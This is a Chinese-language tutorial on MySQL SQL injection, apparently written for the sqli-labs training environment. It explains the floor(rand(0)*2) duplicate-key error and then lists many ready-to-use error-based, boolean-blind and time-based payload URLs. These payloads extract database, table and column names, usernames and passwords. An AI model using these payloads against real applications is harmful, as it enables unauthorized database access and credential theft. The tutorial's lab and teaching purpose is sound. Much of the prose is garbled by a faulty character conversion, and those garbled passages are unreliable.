1.1 sql注入分类与详解

1.基于报错的 SQL 盲注------构造 payload 让信息经过错误提示回显出来

   

---

这里来说一下报错注入的原理（floor型爆错注入）：

0x01:报错过程：

1.rand()用于产生一个0~1的随机数

2.floor()向下取整

 

3.rand()函数生成0~1的任意数字，使用floor函数向下取整，值是固定的0，

若是是rand()*2，向下取整后为0或1

 4.concat()将符合条件的同一列中的不一样行数据进行拼接，0x3a是":"的16进制

5.将以前的rand()函数和floor函数结合起来

 

6.查询出来的名字太长，咱们来起个别名

7.咱们再一次查询，information_schema.tables有多少个表格，会显示多少列

 

 

8.group by依据咱们想要的规矩对结果进行分组

9.count()统计元素的个数

10.咱们多重复几回

 

0x02：rand()和rand(0)

1.根据刚才的运行结果，发现不加随机因子，执行2次就会报错，咱们加上随机因子

看一下结果：

发现每一次都报错，是否是说明报错语句有了floor(rand(0)*2)以及其余条件就必定报错，

验证一下，先建个表test，先只增长一条记录：

而后咱们执行报错语句：

屡次执行均没有发现报错

咱们新增一条记录：

咱们继续执行报错语句：

屡次执行仍是没有发现报错

咱们再新增一条记录：

 

咱们测试一下报错语句：

 成功报错了

由此证实floor(rand(0)*2)的报错是有条件的，记录数必须大于等于3条，3条以上一定报错

 

0x03 肯定性与不肯定性

根据上面的验证，咱们发现：

floor(rand()*2)：二条记录随机出错

floor(rand(0)*2)：三条记录以上必定报错

由此能够猜测，floor(rand()*2)是比较随机的，不具有肯定性因素，而floor(rand(0)*2)具有某方面的肯定性

floor(rand(0)*2) ：报错的原理偏偏是因为他的肯定性

咱们分别执行观察：

floor(rand()*2)：

发现连续三次查询，没有一点规律

floor(rand(0)*2) ：

发现连续三次查询都是有规律的，并且是固定的，这就是上面说的因为肯定性才致使的爆错

 

0x04 count与group by的虚拟表

咱们先看下来查询结果：

能够看出test5的记录有3条

与count(*)的结果相符合，若是mysql遇到了select count(*) from test group by name；

这种语句，会先创建一个虚拟表：

当开始查询数据时，从数据库中取出数据，看在虚拟表中是否有一样的记录，

若是有，就在count(*)字段+1，若是没有就直接插入新记录：

可这怎么引发报错？

 

0x05 floor(rand(0)*2)爆错

其实官方mysql给过提示，就是查询若是使用rand()的话，该值会被计算屡次，也就是在使用group by 的时候，floor(rand(0)*2)会被执行一次，若是虚拟表中不存在记录，把数据插入虚拟表中时会再被执行一次。在0x03中咱们发现floor(rand(0)*2)的值具备肯定性，为01101100111011，报错其实是floor(rand(0)*2)被屡次计算所致使，具体看一下select count(*) from test group by floor(rand(0)*2);

1.查询前会创建虚拟表

2.取第一条记录，执行floor(rand(0)*2)，发现结果为0(第一次计算)，查询虚拟表，发现0的键值不存在，则floor(rand(0)*2)会被再计算一遍，结果为1(第二次计算)，插入虚拟表，这时第一条记录查询完毕：

 

 3.查询第二条记录，再次计算floor(rand(0)*2)，发现结果为1(第三次计算)，查询虚拟表，发现1的键值存在(上图)，因此floor(rand(0)*2)不会被计算第二次，直接count(*)+1，第二条记录查询完毕：

4.查询第三条记录，再次计算floor(rand(0)*2)，发现结果为0(第四次计算)，查询虚拟表，发现0的键值不存在，则虚拟表尝试插入一条新的数据，在插入数据时floor(rand(0)*2)被再次计算，结果为1(第五次计算)，然而1这个主键已经存在于虚拟表中，而新计算的值也为1(应为主键键值必须惟一)，因此插入时直接报错了。

5.整个查询过程floor(rand(0)*2)被计算了5次，查询了3次纪录，这就是为何数据表中须要3条数据，这也就是使用该语句会报错的缘由

 

0x06 flood(rand()*2)爆错

由0x01，0x02咱们发现flood(rand()*2)，具备随机性，

最重要的是前面几条记录查询后不能让虚拟表存在0，1键值，若是存在了，那不管多少条记录都没法报错，应为floor(rand()*2)不会再被计算做为虚拟表的键值，这也就是为何不加随机因子的时候会报错，有时候不报错：

这样的话，就算查询多少条记录，都不会再次被计算，只是简单的count(*)+1，因此不会报错

好比floor(rand(1)*2)：

前两条记录查询过以后，虚拟表中已经存在0,1的键值了，因此后面只会在count(*)上面加，后面不会再爆错

这就是floor型报错注入的原理与过程

 --------------------------------------------------------------------------------

          information_schema这张数据表保存了MySQL服务器全部数据库的信息。如数据库名，

数据库的表，表栏的数据类型与访问权限等。再简单点，这台MySQL服务器上，到底有哪些数

据库、各个数据库有哪些表，每张表的字段类型是什么，各个数据库要什么权限才能访问，等

等信息都保存在information_schema表里面。

 

爆出数据库中的全部数据库名：

select schema_name from information_schema.schemata;

爆出数据库中全部表名：

select table_name from information_schema.tables;

 

爆出数据库中的列名：

select column_name from information_schema.columns where table_name='wp_users';

 

 爆出字段具体的值：

select table_name,table_schema from information_schema.tables group by table_schema；

select group_concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2))name;

0x3a是 ：的16进制

-————------

| name        |

---------------       

|::security::0|

---------------

或者

-————------

| name        |

---------------       

|::security::1|

---------------

 

concat()  ： 链接两个或多个数组

 

select count(*),concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name;

-------————-----------------

|                   |                    |

| count(*)     |     name      |

--------------------------------

|                   |                   |

|     45          |::security::0  |

|                   |                    |

|     41          |::security::1  |

--------------------------------

可是刷新几回发现了一个错误：

ERROR 1062(23000):Duplicate entry'::security::1' for key 'group_key';

 可是这个错误却爆出了当前数据库名，这对咱们SQL注入是有用的，同理，咱们能够换成不一样的函数来获取信息

select count(*),concat(0x3a,0x3a,version(),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name;

刷新多遍，发现这个错误果真能够爆出数据库的版本信息

这样的话，咱们能够尝试爆表

select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name;

屡次刷新

居然真的爆出了表的名字，咱们还能够经过改变limit 0,1 来获取更多地表名

这里顺便补充一下limit 0,1 的用法  ：

select * from table limit m,n

其中m是指记录开始的index，从0开始，表示第一条记录，n是指从第m+1条开始，取n条。

 

limit是mysql的语法

select * from table limit m,n

其中m是指记录开始的index， 从0开始，表示第一条记录

n是指从第m+1条开始，取n条。

select * from tablename limit 2,4

即取出第3条至第6条，4条记

同理咱们换成比较麻烦的来爆出表的名字

 

http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%2

http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='users' limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23

咱们能够找到username,password字段

http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select username from users limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23

能够爆出用户名

http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select password from users limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23

能够爆出用户名对应的用户密码

其余方法

1、经过floor报错,注入语句以下:   爆数据库： http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,database(),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23
 爆表： http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23
 爆字段： http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='users' limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23
 爆用户名： http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select username from users limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23
 爆密码： http://127.0.0.1/sqlilabs/Less-5/?id=-1' and (select 1 from (select count(*),concat(0x3a,0x3a,(select password from users limit 2,1),0x3a,0x3a,floor(rand()*2))name from information_schema.tables group by name)b)%23
 
 
2、经过ExtractValue报错,注入语句以下: 爆数据库： and extractvalue(1, concat(0x5c, (select database()),0x5c)); 爆表： and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables where table_schema=database() limit 0,1),0x5c)); 爆字段： and extractvalue(1, concat(0x5c, (select column_name from information_schema.columns where table_name='users' limit 0,1),0x5c)); 爆用户： and extractvalue(1, concat(0x5c, (select username from users limit 0,1)，0x5c)); 爆密码： and extractvalue(1, concat(0x5c, (select password from users limit 0,1)，0x5c)); 3、经过UpdateXml报错,注入语句以下: 爆数据库： and 1=(updatexml(1,concat(0x3a,(select database()),0x3a),1)) 爆表： and 1=(updatexml(1,concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a),1)) 爆字段： and 1=(updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x3a),1)) 爆用户： and 1=(updatexml(1,concat(0x3a,(select username from users limit 0,1),0x3a),1)) 爆密码： and 1=(updatexml(1,concat(0x3a,(select password from users limit 0,1),0x3a),1)) 4.经过geometrycollection()报错,注入语句以下: select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b)); 5.经过multipoint()报错,注入语句以下: select * from test where id=1 and multipoint((select * from(select * from(select user())a)b)); 6.经过polygon()报错，注入语句以下： select * from test where id=1 and polygon((select * from(select * from(select user())a)b))； 7.经过multipolygon()报错，注入语句以下: select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b)); 8.经过linestring()报错，注入语句以下： select * from test where id=1 and linestring((select * from(select * from(select user())a)b)); 9.经过multilinestring()报错，注入语句以下： select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b)); 10.经过exp()报错，注入语句以下： select * from test where id=1 and exp(~(select * from(select user())a));

---

2：基于布尔 SQL 盲注----------构造逻辑判断

 

 1：基于布尔 SQL 盲注----------构造逻辑判断

 

left(database(),1)>’s’ //left()函数

Explain: database()显示数据库名称，left(a,b)从左侧截取 a 的前 b 位

上面语句也就是判断数据库的第一位的ascill的值是否大于8，若是是页面就返回正常

用法：http://127.0.0.1/sqlilabs/Less-7/?id=1' and left(database())>=8%23

 

ascii(substr((select table_name information_schema.tables where tables_schema =database() limit 0,1),1,1))=101 --+

//substr()函数，ascii()函数

Explain：substr(a,b,c)从 b 位置开始，截取字符串 a 的 c 长度。Ascii()将某个字符转换 为 ascii 值

 

ascii(substr((select database()),1,1))=98

ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))>98%23

//ORD()函数，MID()函数

Explain：mid(a,b,c)从位置 b 开始，截取 a 字符串的 c 位       Ord()函数同 ascii()，将字符转为 ascii 值

 

 

▲regexp 正则注入

正则注入介绍：http://www.cnblogs.com/lcamry/articles/5717442.html

用法介绍：

select user() regexp '^[a-z]';

Explain：正则表达式的用法，user()结果为 root，regexp 为匹配 root 的正则表达式。

第二位能够用 

select user() regexp '^ro'

来进行。

 

示例介绍： 

select * from users where id=1 and 1=(if((user() regexp '^r'),1,0));

select * from users where id=1 and 1=(user() regexp'^ri');

经过 if 语句的条件判断，返回一些条件句，好比 if 等构造一个判断。根据返回结果是否等 于 0 或者 1 进行判断。 

 

select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^us[a-z]' limit 0,1);

这里利用 select 构造了一个判断语句。咱们只须要更换 regexp 表达式便可

 

'^u[a-z]' -> '^us[a-z]' -> '^use[a-z]' -> '^user[a-z]' -> FALSE

 

如何知道匹配结束了？这里大部分根据通常的命名方式（经验）就能够判断。可是如何你在 没法判断的状况下，能够用

table_name regexp '^username$

'来进行判断。^是从开头进行 匹配，$是从结尾开始判断。更多的语法能够参考 mysql 使用手册进行了解

 

---

 

3:基于时间的 SQL 盲注----------延时注入

If(ascii(substr(database(),1,1))>115,0,sleep(5))%23

//if 判断语句，条件为假， 执行 sleep

Ps：遇到如下这种利用 sleep()延时注入语句

select sleep(find_in_set(mid(@@version, 1, 1), '0,1,2,3,4,5,6,7,8, 9,.'));

该语句意思是在 0-9 之间找版本号的第一位。可是在咱们实际渗透过程当中，这种用法是不可 取的，由于时间会有网速等其余因素的影响，因此会影响结果的判断。

 

UNION SELECT IF(SUBSTRING(current,1,1)=CHAR(119),BENCHMARK(5000000,ENCODE(‘M SG’,’by 5 seconds’)),null) FROM (select database() as current) as tb1;

//BENCHMARK(count,expr)用于测试函数的性能，参数一为次数，二为要执行的表达 式。可让函数执行若干次，返回结果比平时要长，经过时间长短的变化，判断语句是否执 行成功。这是一种边信道攻击，在运行过程当中占用大量的 cpu 资源。推荐使用 sleep()

函数进行注入。

 

猜想数据库：

http://127.0.0.1/sqllib/Less-9/?id=1%27and%20If(ascii(substr(database(),1,1))=115,1,sleep(5))--+

说明第一位是 s （ascii 码是 115）

http://127.0.0.1/sqllib/Less-9/?id=1%27and%20If(ascii(substr(database(),2,1))=101,1,sleep(5))--+

说明第二位是 e （ascii 码是 101） ....

以此类推，咱们知道了数据库名字是 security

猜想 security 的数据表：

http://127.0.0.1/sqllib/Less-9/?id=1'and If(ascii(substr((select table_name from information_s chema.tables where table_schema='security' limit 0,1),1,1))=101,1,sleep(5))--+

 猜想第一个数据表的第一位是 e,...

依次类推，获得 emails

http://127.0.0.1/sqllib/Less-9/?id=1'and If(ascii(substr((select table_name from information_s chema.tables where table_schema='security' limit 1,1),1,1))=114,1,sleep(5))--+

猜想第二个数据表的第一位是 r,...

依次类推，获得 referers ...

再以此类推，咱们能够获得全部的数据表 emails,referers,uagents,users

 

猜想 users 表的列：

http://127.0.0.1/sqllib/Less-9/?id=1'and If(ascii(substr((select column_name from information _schema.columns where table_name='users' limit 0,1),1,1))=105,1,sleep(5))--+

猜想 users 表的第一个列的第一个字符是 i，

以此类推，咱们获得列名是 id，username，password

 

 ````````````````

猜想 username 的值：

http://127.0.0.1/sqllib/Less-9/?id=1'and If(ascii(substr((select username from users limit 0,1), 1,1))=68,1,sleep(5))--+

猜想 username 的第一行的第一位 以此类推，咱们获得数据库 username，password 的全部内容

 

以上的过程就是咱们利用 sleep()函数注入的整个过程，固然了能够离开 BENCHMARK()函数进 行注入，这里能够自行进行测试。咱们这里就不进行演示了